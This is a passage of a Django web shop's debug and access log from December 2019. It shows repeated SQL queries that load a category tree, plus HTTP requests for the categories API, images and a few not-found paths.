ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:09:27,541 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:09:27,545 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:09:27,549 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:09:27,553 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:09:27,558 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:09:27,562 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:09:27,566 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:09:27,571 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:09:27,575 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:09:27] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:10:06] "GET / HTTP/1.0" 302 0 [19/Dec/2019 10:15:11] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [19/Dec/2019 10:15:56] "GET /robots.txt HTTP/1.0" 404 6451 Not Found: /User/User_Favorite.asp [19/Dec/2019 10:15:57] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=182 HTTP/1.0" 404 6532 Not Found: /newslist.asp [19/Dec/2019 10:15:59] "GET /newslist.asp?type=4&id=1273 HTTP/1.0" 404 6476 [19/Dec/2019 10:19:20] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 10:23:40,795 utils 4252 140031482124032 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:23:40,806 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:23:40,812 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:23:40,816 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:23:40,822 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:23:40,826 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:23:40,830 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:23:40,834 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:23:40,838 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:23:40,844 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:23:40,848 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:23:40,851 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:23:40,855 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:23:40,859 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:23:40,866 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:23:40,870 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:23:40,874 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:23:40,879 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:23:40,884 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:23:40,889 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:23:40,894 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:23:40,899 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:23:40,902 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:23:40,909 utils 4252 140031482124032 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:23:40,913 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:23:40,917 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:23:40,920 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:23:40,922 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:23:40,925 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:23:40,928 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:23:40,932 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:23:40,935 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:23:40,938 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:23:40,940 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:23:40,943 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:23:40,948 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:23:40,951 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:23:40,953 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:23:40,956 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:23:40,958 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:23:40,961 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:23:40,964 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:23:40,967 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:23:40,970 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:23:40,973 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:23:40,976 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:23:40] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:23:43] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 10:23:43] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 10:24:17,121 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:24:17,128 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:24:17,131 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:24:17,134 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:24:17,137 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:24:17,139 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:24:17,142 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:24:17,144 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:24:17,147 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:24:17,150 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:24:17,152 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 